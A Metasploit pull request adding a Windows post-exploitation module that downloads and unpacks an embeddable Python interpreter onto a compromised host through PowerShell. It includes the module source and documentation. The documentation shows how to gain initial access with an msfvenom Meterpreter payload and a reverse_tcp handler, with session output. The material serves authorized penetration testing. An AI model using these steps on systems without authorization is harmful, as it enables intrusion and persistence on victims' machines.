### PR TITLE
New Windows post module: install_python

### DIFF
--- a/documentation/modules/post/windows/manage/install_python.md
+++ b/documentation/modules/post/windows/manage/install_python.md
@@ -1,0 +1,80 @@
+This module downloads an embeddable Python3 interpreter onto the target file system, granting pentesters access to a lightweight Python interpreter. This module does not require administrative privileges or user interaction with installation prompts.
+### Creating A Testing Environment
+
+  This module has been tested against:
+
+1. Windows 10, 1903
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get a Meterpreter session running as a low privilege user
+  3. Do: `use post/windows/manage/install_python`
+  4. Do: `set session #`
+  5. Optional Do: `set PYTHON_URL`
+  6. Optional Do: `set FILE_PATH`
+  7. Do: `run`
+
+
+## Options
+
+  **PYTHON_URL**
+
+  Specifies the URL used to download the Python embeddable zip file. Downloads Python version 3.8.2 by default.
+
+  **FILE_PATH**
+
+  Specifies the directory to place the Python embeddable zip file.
+  Places Python zip file in the current working directory by default.
+
+  **CLEANUP**
+
+  If true, this option will delete the Python zip file as well as its extracted contents. It will also terminate running processes with name 'python', as you cannot delete the Python interpreter if it is actively running.
+
+## Scenarios
+
+Get initial access: Create a Meterpreter exe using msfvenom, then transfer it to the target system via web server, SMB, etc. Execute the Meterpreter payload as a non-administrative user.
+
+    msf5 > handler -H 0.0.0.0 -P 4444 -p windows/meterpreter/reverse_tcp
+    [*] Payload handler running as background job 0.
+
+    [*] Started reverse TCP handler on 0.0.0.0:4444 
+    msf5 > 
+    [*] Sending stage (180291 bytes) to 192.168.13.129
+    [*] Meterpreter session 1 opened (192.168.13.130:4444 -> 192.168.13.129:50069) at 2020-03-04 20:32:59 -0500
+
+
+
+
+Use the post module to install Python on the target filesystem
+
+    msf5 > use post/windows/manage/install_python 
+    msf5 post(windows/manage/install_python) > set SESSION 1
+    SESSION => 1
+    msf5 post(windows/manage/install_python) > exploit 
+
+    [*] Downloading Python embeddable zip from https://www.python.org/ftp/python/3.8.2/python-3.8.2-embed-win32.zip
+    [+] Compressed size: 1112
+    [*] Extracting Python zip file: .\python-3.8.2-embed-win32.zip
+    [+] Compressed size: 952
+    [*] Ready to execute Python; spawn a command shell and enter:
+    [+] .\python-3.8.2-embed-win32\python.exe -c "print('Hello, world!')"
+    [!] Avoid using this python.exe interactively, as it will likely hang your terminal; use script files or 1 liners instead
+    [*] Post module execution completed
+
+Verify Python works
+
+    msf5 post(windows/manage/install_python) > sessions -i 1 
+    [*] Starting interaction with 1...
+
+    meterpreter > shell
+    Process 2688 created.
+    Channel 5 created.
+    Microsoft Windows [Version 10.0.17763.1039]
+    (c) 2018 Microsoft Corporation. All rights reserved.
+
+    C:\Users\buddha\AppData\Local\Temp>.\python-3.8.2-embed-win32\python.exe -c "print('Hello, world!')"
+    .\python-3.8.2-embed-win32\python.exe -c "print('Hello, world!')"
+    Hello, world!
+
+Note that running this Python interpreter interactively may hang your command shell.

--- a/documentation/modules/post/windows/manage/install_python.md
+++ b/documentation/modules/post/windows/manage/install_python.md
@@ -1,26 +1,32 @@
-This module downloads an embeddable Python3 interpreter onto the target file system, granting pentesters access to a lightweight Python interpreter. This module does not require administrative privileges or user interaction with installation prompts.
-### Creating A Testing Environment
+## Overview
 
-  This module has been tested against:
+This module downloads an embeddable Python3 distribution onto the target file system, granting pentesters access to a lightweight Python interpreter. This module does not require administrative privileges or user interaction with installation prompts.
+
+## Tested Version
+This module has been tested against:
 
 1. Windows 10, 1903
 
 ## Verification Steps
 
   1. Start msfconsole
-  2. Get a Meterpreter session running as a low privilege user
+  2. Get a Meterpreter session
   3. Do: `use post/windows/manage/install_python`
-  4. Do: `set session #`
-  5. Optional Do: `set PYTHON_URL`
-  6. Optional Do: `set FILE_PATH`
-  7. Do: `run`
+  4. Do: `set SESSION #`
+  5. Optional Do: `set PYTHON_VERSION`
+  6. Optional Do: `set PYTHON_URL`
+  7. Optional Do: `set FILE_PATH`
+  8. Do: `run`
 
 
 ## Options
+  **PYTHON_VERSION**
+
+  Specifies the Python version you would like to download. Downloads Python version 3.8.2 by default.
 
   **PYTHON_URL**
 
-  Specifies the URL used to download the Python embeddable zip file. Downloads Python version 3.8.2 by default.
+  Specifies the URL used to download the Python embeddable zip file.
 
   **FILE_PATH**
 
@@ -33,7 +39,7 @@ This module downloads an embeddable Python3 interpreter onto the target file sys
 
 ## Scenarios
 
-Get initial access: Create a Meterpreter exe using msfvenom, then transfer it to the target system via web server, SMB, etc. Execute the Meterpreter payload as a non-administrative user.
+Get initial access: Create a Meterpreter exe using msfvenom, then transfer it to the target system via web server, SMB, etc. Execute the payload to get a session.
 
     msf5 > handler -H 0.0.0.0 -P 4444 -p windows/meterpreter/reverse_tcp
     [*] Payload handler running as background job 0.
@@ -42,9 +48,6 @@ Get initial access: Create a Meterpreter exe using msfvenom, then transfer it to
     msf5 > 
     [*] Sending stage (180291 bytes) to 192.168.13.129
     [*] Meterpreter session 1 opened (192.168.13.130:4444 -> 192.168.13.129:50069) at 2020-03-04 20:32:59 -0500
-
-
-
 
 Use the post module to install Python on the target filesystem
 

--- a/modules/post/windows/manage/install_python.rb
+++ b/modules/post/windows/manage/install_python.rb
@@ -1,0 +1,84 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Post::Windows::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'          => 'Install Python for Windows',
+                      'Description'   => '
+                        This module places an embeddable Python3 interpreter onto the target file system,
+                        granting pentesters access to a lightweight Python interpreter.
+                        This module does not require administrative privileges or user interaction with
+                        installation prompts.
+                      ',
+                      'License'       => MSF_LICENSE,
+                      'Author'        => ['Michael Long <bluesentinel[at]protonmail.com>'],
+                      'Arch' => [ARCH_X86, ARCH_X64],
+                      'Platform'      => [ 'win' ],
+                      'SessionTypes'  => [ 'meterpreter', 'shell' ],
+                      'References'	=> [
+                        ['URL', 'https://docs.python.org/3/using/windows.html#windows-embeddable'],
+                        ['URL', 'https://attack.mitre.org/techniques/T1064/']
+                      ]))
+    register_options(
+      [
+        OptString.new('PYTHON_URL', [true, 'Python embeddable zip URL', 'https://www.python.org/ftp/python/3.8.2/python-3.8.2-embed-win32.zip']),
+        OptString.new('FILE_PATH', [true, 'File path to store the python zip file; current directory by default', '.\\python-3.8.2-embed-win32.zip']),
+        OptBool.new('CLEANUP', [false, 'Remove module artifacts; set to true when ready to cleanup', false])
+      ]
+    )
+  end
+
+  def run
+    python_folder_path = File.basename(datastore['FILE_PATH'].to_s, File.extname(datastore['FILE_PATH'].to_s))
+    python_exe_path = python_folder_path + "\\python.exe"
+
+    # check if PowerShell is available
+    psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"
+    if !file? "%WINDIR%\\System32#{psh_path}"
+      fail_with(Failure::NotVulnerable, "No powershell available.")
+    end
+
+    # Cleanup module artifacts
+    if datastore['CLEANUP']
+      print_status("Removing module artifacts")
+      script = "Stop-Process -Name \"python\" -Force; "
+      script << "Remove-Item -Force #{datastore['FILE_PATH']}; "
+      script << "Remove-Item -Force -Recurse #{python_folder_path}; "
+      psh_exec(script)
+      return
+    end
+
+    # download python embeddable zip file
+    script = "Invoke-WebRequest -Uri #{datastore['PYTHON_URL']} -OutFile #{datastore['FILE_PATH']}; "
+    print_status("Downloading Python embeddable zip from #{datastore['PYTHON_URL']}")
+    psh_exec(script)
+
+    # confirm python zip file is present
+    if !file? datastore['FILE_PATH'].to_s
+      fail_with(Failure::NotFound, "Failed to download #{datastore['PYTHON_URL']}")
+    end
+
+    # extract python embeddable zip file
+    script = "Expand-Archive #{datastore['FILE_PATH']}; "
+    print_status("Extracting Python zip file: #{datastore['FILE_PATH']}")
+    psh_exec(script)
+
+    # confirm python.exe is present
+    if !file? python_exe_path
+      fail_with(Failure::NotFound, python_exe_path)
+    end
+
+    # display location of python interpreter with example command
+    print_status("Ready to execute Python; spawn a command shell and enter:")
+    print_good("#{python_exe_path} -c \"print('Hello, world!')\"")
+    print_warning("Avoid using this python.exe interactively, as it will likely hang your terminal; use script files or 1 liners instead")
+
+  end
+end


### PR DESCRIPTION
This module downloads an embeddable Python3 interpreter onto the target file system, granting pentesters access to a lightweight Python interpreter. This module does not require administrative privileges or user interaction with installation prompts.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Get a low privilege Meterpreter session on a Windows 10 system
- [x] `use post/windows/manage/install_python`
- [x] `set SESSION 1`
- [x] `exploit`
- [x] `sessions -i 1`
- [x] `shell`
- [x] `.\python-3.8.2-embed-win32\python.exe -c "print('Hello, world!')"`

You should see "Hello, world!" output to the terminal.

